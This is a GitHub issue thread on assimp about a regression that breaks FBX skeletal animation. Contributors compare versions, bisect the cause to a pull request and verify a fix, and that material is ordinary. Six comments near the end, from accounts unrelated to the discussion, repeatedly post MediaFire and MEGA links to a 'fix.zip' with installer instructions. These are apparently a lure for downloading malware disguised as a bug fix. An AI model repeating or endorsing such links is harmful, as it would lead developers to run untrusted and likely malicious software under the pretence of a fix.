### ISSUE TITLE
Bug: broken fbx animation

### ISSUE THREAD

**Issue by tigert1998** [assimp/assimp#5449] opened 2024-02-01 01:43 UTC
**Describe the bug**
The FBX animation support is broken in the latest master branch. However, animation still works in [v5.3.1](https://github.com/assimp/assimp/releases/tag/v5.3.1). So the latest several commits must have made animation broken.

**To Reproduce**
My model loader code is available at https://github.com/tigert1998/tiger-game-engine/blob/main/engine/src/model.cc.
You could build the `instancing-demo` CMake target to test.
The two models with broken animation (fbx version) are (these two both work in v5.3.1):
- https://sketchfab.com/3d-models/silver-dragonkin-mir4-89ead4e87cdc4b70840f748383f0998f
- https://sketchfab.com/3d-models/tarisland-dragon-high-poly-ecf63885166c40e2bbbcdf11cd14e65f

**Expected behavior**

**Screenshots**

**Platform (please complete the following information):**
 - OS: Windows
 - Version: latest master

**Additional context**

**Comment by tellypresence** [comment] 2024-02-06 20:56
Confirm broken animation.  
<table>
<tr><th colspan=2>Model <tt>tarisland-dragon-high-poly</tt></th></tr>
<tr><th>Animation</th><th>Screenshot</th></tr>
<tr><td><tt>Qishilong_skill06</tt></td><td><img alt="tarisland-dragon-high-poly_Qishilong_skill06_anim" src="https://github.com/assimp/assimp/assets/26958898/5a3a3db6-287b-4140-ba91-d592f1b6679e" width=240></td></tr>
</table>

**Comment by JulianKnodt** [comment] 2024-03-26 05:24
Can you double check if this is still broken? I broke the FBX animation with a change, and it was recently fixed.

**Comment by tellypresence** [comment] 2024-03-27 04:47
Built against `feb861f` (latest) but unfortunately no improvement, animations still completely broken

**Comment by tellypresence** [comment] 2024-03-27 14:59
In fact I just built against [release 5.3.1](https://github.com/assimp/assimp/archive/refs/tags/v5.3.1.zip) and get the same results.  So either there's a problem in my implementation, or the fbx animation was broken earlier than reported

**Comment by tellypresence** [comment] 2024-03-27 21:03
Here are examples of fbx files where animation wasn't working in release 5.3.1; models available from [renderpeople.com](https://renderpeople.com/free-3d-people/), under "3D Animated People" click "Free Download" button, then click the "FBX" button and download zip

<table>
<tr><th>Model</th><th>Assimp version</th><th>Screenshot</th><th>Assimp version</th><th>Screenshot</th><th>Notes</th></tr>
<tr><td><tt>22-rp_manuel_animated_001_dancing_fbx</tt></td><td  rowspan=3><tt>feb861f</tt> (21 Mar 2024)</td></td><td><img src="https://github.com/assimp/assimp/assets/26958898/67ffcf6a-2ff0-4937-b40a-36f8b7e3f3b9" alt="22-rp_manuel_animated_001_dancing_fbx_assimp_commit_feb861f" width=90></td><td rowspan=3><tt>release 5.3.1</tt></td><td><img src="https://github.com/assimp/assimp/assets/26958898/765bad68-600a-4a4e-9bae-c20ff5c7a1e1" alt="22-rp_manuel_animated_001_dancing_fbx_assimp_release_5_3_1" width=90></td><td>Worked in release 5.3.1, obviously wrong now</td></tr>
<tr><td><tt>35-rp_sophia_animated_003_idling_fbx</tt></td><td><img src="https://github.com/assimp/assimp/assets/26958898/8cf063e1-2946-40c7-bf97-174251f1157f" alt="35-rp_sophia_animated_003_idling_fbx_assimp_commit_feb861f" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/2e1dcf9f-9a23-46a8-afd8-f4eb7fc1375b" alt="35-rp_sophia_animated_003_idling_fbx_assimp_release_5_3_1" width=90></td><td>Didn't work in release 5.3.1, obviously worse now</td></tr>
<tr><td><tt>55-rp_nathan_animated_003_walking_fbx</tt></td><td><img src="https://github.com/assimp/assimp/assets/26958898/5ffb8b16-f2b9-4e74-b7c2-71991e35e877" alt="55-rp_nathan_animated_003_walking_fbx_assimp_commit_feb861f" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/d2570a2e-e20c-4fb0-ba51-84dc639a67d6" alt="55-rp_nathan_animated_003_walking_fbx_release_5_3_1" width=90></td><td>Didn't work in release 5.3.1, no obvious difference now</td></tr>
<table>

**Comment by kimkulling** [comment] 2024-03-28 11:27
Oh my gosh, that looks bad. I got it!

**Comment by shinyclaw** [comment] 2024-04-02 12:17
Confirmed at version from today's master branch. Animation "Hip Hop Dancing" on model "CH42_NOPBR" from Mixamo.

https://github.com/assimp/assimp/assets/7187363/92d30430-40f7-4234-af78-f6b74608b243

**Comment by mwestphal** [comment] 2024-04-14 17:08
I've bisected the issue to https://github.com/assimp/assimp/pull/5349

**Comment by mwestphal** [comment] 2024-04-14 17:10
Please note this is NOT the same issue as https://github.com/assimp/assimp/issues/3390

**Comment by kikonen** [comment] 2024-05-05 19:15
Just tried to update from 5.3.1 to 5.4.0, and well, as a result got kind of abstract art, which looks similar to samples here.

**Comment by tellypresence** [comment] 2024-08-16 04:52
> I've bisected the issue to #5349

Looks like #5349 was 27 Nov 2023, but release <a href="https://github.com/assimp/assimp/commits/v5.3.1"><tt>v5.3.1</tt></a> was 25 Sep 2023; at least for the RenderPeople models, the breakage must have happened earlier than that (since they were already broken at v5.3.1)

**Comment by tellypresence** [comment] 2024-08-17 23:29
@kikonen Are you able to share your test FBX model file(s) for troubleshooting purposes?

**Comment by tellypresence** [comment] 2024-08-17 23:30
@shinyclaw Have you got a link to the Mixamo `CH42_NOPBR` model?

**Comment by kikonen** [comment] 2024-08-18 05:59
@tellypresence I presume I can share files for testing, just can't share them publicly to everyone.

**Comment by lxw404** [comment] 2024-08-18 08:09
@kikonen Please try: https://github.com/assimp/assimp/pull/5643.  I'm fairly sure I've fixed this regression, but it would be good to have more people verify it (and encourage that it gets merged).

**Comment by kikonen** [comment] 2024-08-18 16:49
@lxw404 seems to work improve animation result at least in my Lion.FBX case

**without fix**
Nice abstract art...
![image](https://github.com/user-attachments/assets/d7dd3173-4d26-4a35-a11a-5cbc7ce4036d)

**With fix**
Expected result
![image](https://github.com/user-attachments/assets/3d47eda2-c710-4a3d-b49a-749b412bc45c)

Since goal in my project is not establishing abstract art exhibition, I prefer "boring expected result" :D

**Comment by lxw404** [comment] 2024-08-18 18:02
@kikonen These abstract art ones are hilarious, but I agree the boring expected result is probably best long term.

I'm guessing the skeleton is a completely separate issue then if it has never worked with assimp in any version before.  I could possibly take a look at that and see what's up at some point.

**Comment by JulianKnodt** [comment] 2024-08-19 01:04
I think there can be issues with multiple meshes in a single node (specifically I found some when exporting meshes with nodes with multiple meshes), but it would be useful to know the hierarchy of your scene

**Comment by tellypresence** [comment] 2024-08-19 03:41
@kikonen 
Thank you for the link.  It looks like both the Lion and Skeleton Knight have 2 FBX files each, the main mesh plus a separate animation-only FBX file.  Do you have any way to export a single FBX file containing both the mesh and animation data?

**Comment by kikonen** [comment] 2024-08-19 05:42
If possible should separate that skeleton into another issue.

Regarding fbx files, not sure how easily I could get them into same file. I.e. original files were separate files (mesh + anim), so to merge them would propably have try importing them into Blender and merge them there (and Blender seems to have its own issues with fbx import).

**Comment by tellypresence** [comment] 2024-08-20 22:13
> @kikonen Please try: #5643. I'm fairly sure I've fixed this regression, but it would be good to have more people verify it (and encourage that it gets merged).

@kikonen Please sync your PR branch (it's out of date)

**Comment by kikonen** [comment] 2024-08-21 10:56
@tellypresence Did some trial with #5643 fix with current assimp master, and it was working for me same way as nonrebased version in PR. Noticed additionally that base transforms for few static mesh fbx files I had exported from unreal seemed to work now better, i.e. previously I had to apply -90 degree rotation along X axis to them after importing.

You probably meant that sync req to @lxw404 :)

**Comment by esttemanb** [comment] 2024-08-25 08:23
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-25 08:27
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-25 08:36
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-25 08:44
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-25 08:48
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment] 2024-08-25 08:51
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Closed** 2024-09-11 08:11 UTC
Labels: Bug

**Comment by tellypresence** [comment] 2024-09-12 02:24
Confirm that commit [`f81ea69`](https://github.com/assimp/assimp/commit/f81ea6986ccd30a016ec44a1fd46e2e5c3ff9d4c) fixed fbx animation for limited set of models

<table>
<tr><th rowspan=2>Model</th><th colspan=2>Assimp version</th><th rowspan=2>Notes</th></tr>
<tr><th><a href="https://github.com/assimp/assimp/commit/ab12e8d8baecac95daa23ebb5528fe3d90e3c71e"><tt>ab12e8d</tt></a> (11 Sep 2024)<br>Before PR #5751</th><th><a href="https://github.com/assimp/assimp/commit/f81ea6986ccd30a016ec44a1fd46e2e5c3ff9d4c"><tt>f81ea69</tt></a> (11 Sep 2024)<br>After PR #5751</th></tr>

<tr><td><a href="https://sketchfab.com/3d-models/tarisland-dragon-high-poly-ecf63885166c40e2bbbcdf11cd14e65f"><tt>tarisland-dragon-high-poly</tt></td><td><img src="https://github.com/user-attachments/assets/83639421-efe9-47ff-9f61-996f572039b0" alt="tarisland-dragon_ab12e8d" width=120></td><td><img src="https://github.com/user-attachments/assets/df3d1b97-1445-4f1b-b059-325eaa713f9f" alt="tarisland-dragon_f81ea69" width=120></td><td></td></tr>

</table>

**Comment by mwestphal** [comment] 2024-09-12 05:52
As I stated above:

> Please note this is NOT the same issue as #3390

**Comment by kikonen** [comment] 2024-11-16 10:53
Latest release seems to  be still 5.4.3 from Aug 30. Any changes of getting 5.4.4 containing this fix?

**Comment by pepcots** [comment] 2025-03-10 10:36
> Latest release seems to be still 5.4.3 from Aug 30. Any changes of getting 5.4.4 containing this fix?
> 
> Specificly I would need version tagged in vcpkg in order to be usable in my project
> 
> **EDIT** My rather ugly workaround to get "latest'n'greatest" from assimp master into my vcpkg package manager based project; created custom vcpkg repo containing assimp compiled from master branch :D Yeah, rewriting project to use some other mechanism for managing library dep, is not in the goals of that project (yet, I may someday get inspiration, but right not that is not) :D
> 
> https://github.com/kikonen/vcpkg-registry

Thanks! I overlayed my local vcpkg with your repo (installed as submodule) and it works fine now! Hope there is a new release soon with the fix. Many thanks @kikonen !
